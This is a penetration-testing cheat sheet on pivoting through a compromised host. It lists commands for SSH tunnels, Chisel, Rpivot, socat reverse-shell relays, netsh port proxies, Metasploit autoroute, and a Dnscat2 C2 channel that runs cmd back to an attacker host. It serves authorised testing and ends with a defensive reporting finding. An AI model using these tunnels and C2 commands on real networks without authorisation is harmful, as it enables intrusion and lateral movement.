Field Manual

Pivoting Cheat Sheet

5 min read

πŸ›‘οΈ Methodology Checklist

  • Identify pivot host: dual-homed, compromised, or trusted bridging host
  • Choose method: SSH -D (Linux SSH access) / Chisel (Windows pivot) / MSF autoroute (existing session)
  • Configure Proxychains for chosen SOCKS port
  • Validate tunnel: test connectivity to internal target before full attack
  • Run tools through Proxychains (proxychains4 -q)
  • Clean up all tunnel processes and proxy configs on exit

🎯 Operational Context

Use when: Identifying the right pivoting tool for current access and target network β€” quick decision matrix for SSH/Chisel/MSF/netsh/socat selection. Think Dumber First: SSH access on Linux pivot β†’ ssh -D 9050 (30-second setup). Windows pivot no tools β†’ netsh portproxy. Have Meterpreter β†’ autoroute. Match the tool to what’s already available β€” don’t transfer Chisel if SSH works. Skip when: N/A β€” reference document.

⚑ Tactical Cheatsheet

CommandTactical Outcome
ifconfigLinux β€” show all NICs and IPs (find dual-homed hosts)
netstat -rLinux β€” show routing table
ipconfig /allWindows β€” show all adapters
route printWindows β€” show routing table
for i in {1..254}; do (ping -c 1 [SUBNET].$i | grep "bytes from" &); doneLinux bash ping sweep
for /L %i in (1 1 254) do ping [SUBNET].%i -n 1 -w 100 | find "Reply"Windows CMD ping sweep
1..254 | % {"[SUBNET].$($_): $(Test-Connection -count 1 -comp [SUBNET].$($_) -quiet)"}PowerShell ping sweep
ssh -L [LPORT]:localhost:[REMOTE_PORT] [USER]@[PIVOT_IP]SSH local forward β€” single service
ssh -D 9050 [USER]@[PIVOT_IP]SSH dynamic forward β€” SOCKS proxy for entire subnet
ssh -R [PIVOT_LAN_IP]:[PIVOT_PORT]:0.0.0.0:[LPORT] [USER]@[PIVOT_IP] -vNSSH remote forward β€” catch reverse shell through pivot
sudo sshuttle -r [USER]@[PIVOT_IP] [SUBNET]/[CIDR] -vTransparent SSH proxy β€” no proxychains needed
echo y | plink.exe -ssh -D 9050 [USER]@[PIVOT_IP]Windows plink β€” SOCKS proxy
plink.exe -ssh -L [LPORT]:[INTERNAL_IP]:[PORT] [USER]@[PIVOT_IP] -pw [PASS]Windows plink β€” local port forward
sudo sed -i 's/socks4.*/socks5 127.0.0.1 1080/' /etc/proxychains4.confUpdate proxychains config in-place
proxychains nmap -v -Pn -sT [TARGET_IP]Nmap through SOCKS (must use -sT -Pn)
proxychains xfreerdp3 /v:[TARGET_IP] /u:[USER] /p:[PASS] /dynamic-resolution +clipboard /cert:ignoreRDP through SOCKS proxy
socat TCP4-LISTEN:[PIVOT_PORT],fork TCP4:[LHOST]:[LPORT]Socat reverse shell relay
socat TCP4-LISTEN:[PIVOT_PORT],fork TCP4:[INTERNAL_IP]:[TARGET_PORT]Socat bind shell relay
netsh.exe interface portproxy add v4tov4 listenport=[LPORT] listenaddress=[PIVOT_IP] connectport=[TARGET_PORT] connectaddress=[INTERNAL_IP]Windows netsh port forward
netsh advfirewall firewall add rule name="Pivot" dir=in action=allow protocol=TCP localport=[LPORT]Open Windows firewall for netsh rule
netsh interface portproxy delete v4tov4 listenport=[LPORT] listenaddress=[PIVOT_IP]Remove netsh rule (cleanup)
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0Rpivot server on attack host
python2.7 client.py --server-ip [LHOST] --server-port 9999Rpivot client on pivot host
./chisel server -v -p [PORT] --socks5Chisel bind server on pivot
./chisel client -v [PIVOT_IP]:[PORT] socksChisel client connect to bind server
sudo ./chisel server --reverse -v -p [PORT] --socks5Chisel reverse server on attack host
./chisel client -v [LHOST]:[PORT] R:socksChisel reverse client on pivot
sudo ruby dnscat2.rb --dns host=[LHOST],port=53,domain=[DOMAIN] --no-cacheDnscat2 C2 server
Start-Dnscat2 -DNSserver [LHOST] -Domain [DOMAIN] -PreSharedSecret [SECRET] -Exec cmdDnscat2 PowerShell client
sudo ./ptunnel-ng -p[PIVOT_IP] -l 2222 -r[PIVOT_IP] -R 22 -vptunnel-ng client β€” SSH over ICMP
ssh -D 9050 -p 2222 ubuntu@127.0.0.1SOCKS proxy through ICMP tunnel
regsvr32.exe SocksOverRDP-Plugin.dllRegister SocksOverRDP plugin on Windows jump host
run post/multi/manage/autoroute SESSION=[N] SUBNET=[SUBNET]MSF AutoRoute β€” internal subnet via Meterpreter
use auxiliary/server/socks_proxy β†’ set SRVPORT 9050 β†’ set version 4a β†’ runMSF SOCKS proxy via AutoRoute
meterpreter > portfwd add -l [LPORT] -p [TARGET_PORT] -r [INTERNAL_IP]Meterpreter local port forward
meterpreter > portfwd add -R -l [LPORT] -p [PIVOT_PORT] -L [LHOST]Meterpreter reverse port forward
xfreerdp3 /v:[TARGET_IP] /u:[USER] /p:[PASS] /drive:tools,[LOCAL_PATH] /cert:ignoreRDP with local drive share for tool transfer

πŸ”¬ Deep Dive & Workflow

Tool Selection Decision Tree

Do you have SSH access to the pivot?
β”œβ”€β”€ Yes β†’ SSH (-D for subnet, -L for single service, -R for reverse shell)
β”‚         OR sshuttle (if you want no proxychains overhead)
└── No β†’ Do you have a Meterpreter session?
         β”œβ”€β”€ Yes β†’ AutoRoute + SOCKS module, or portfwd for specific ports
         └── No β†’ Can you drop a binary on pivot?
                  β”œβ”€β”€ Yes (Linux) β†’ Chisel (SOCKS5, bind or reverse)
                  β”‚                 OR Rpivot (if pivot can only call out)
                  β”‚                 OR Socat (for relay without SOCKS)
                  β”œβ”€β”€ Yes (Windows) β†’ Chisel or SocksOverRDP or plink (if PuTTY present)
                  β”‚                   OR netsh for simple port forward (no binary needed)
                  └── Protocol tunneling needed?
                       β”œβ”€β”€ Only DNS egress β†’ Dnscat2
                       └── Only ICMP allowed β†’ ptunnel-ng

Proxychains Rules

  • Always -sT (TCP connect scan) and -Pn (skip ping) with Nmap through SOCKS
  • SYN scans (-sS) and UDP scans fail through SOCKS4/4a; SOCKS5 handles UDP but tool support varies
  • ICMP (ping) does not traverse SOCKS tunnels
  • SOCKS5 (socks5 in proxychains.conf) preferred over SOCKS4 when available

Common Port Conflicts

ScenarioProblemFix
plink RDP forward on WindowsPort 3389 in use by local RDPUse local port 3390 instead
SSH -D vs existing SOCKSPort 9050 in use by TorUse alternate port (8080, 1080, etc.)
netsh portproxy bind failsNot running as AdministratorOpen elevated CMD

Cleanup Checklist

# Remove netsh rule
netsh interface portproxy delete v4tov4 listenport=[LPORT] listenaddress=[PIVOT_IP]
 
# Remove MSF routes
run post/multi/manage/autoroute ACTION=remove SUBNET=[SUBNET]
 
# Flush portfwd rules
meterpreter > portfwd flush
 
# Kill socat/chisel processes on pivot
kill [PID]

πŸ› οΈ Troubleshooting & Edge Cases

ProblemCauseFix
No pivoting tool worksAll blockedCheck available alternatives: python3 socks proxy, socat, /dev/tcp; tool-free options exist
Proxychains not working with toolConfig file wrongVerify: /etc/proxychains.conf has socks5 127.0.0.1 [PORT]; use socks5 not socks4
Tunnel established but target unreachableRoute not addedAdd route for internal subnet; MSF: route add [SUBNET] [MASK] [SESSION_ID]
Multiple tunnels creating loopsMisconfigured chainingDocument tunnel chain clearly; each hop needs its own port; test connectivity at each step
VPN drops killing tunnelHTB lab instabilityUse -o ServerAliveInterval=30 ServerAliveCountMax=3 in SSH for keepalive; re-establish quickly after drop

πŸ“ Reporting Trigger

Finding Title: Pivot Through Compromised Host Enables Internal Network Access Impact: Establishing a SOCKS proxy through a compromised dual-homed host provides full access to the internal network segment from the attacker’s external position, enabling attacks against previously unreachable systems. Root Cause: Compromised host has access to multiple network segments without adequate segmentation controls. No monitoring of unusual outbound connections from the pivot host. Recommendation: Implement network micro-segmentation to limit lateral connectivity. Monitor for unusual outbound connections (SOCKS proxy patterns, tunnel protocols) from internal hosts. Deploy host-based firewall rules restricting inter-segment connectivity.

πŸ”— Related Nodes

Graph View

Backlinks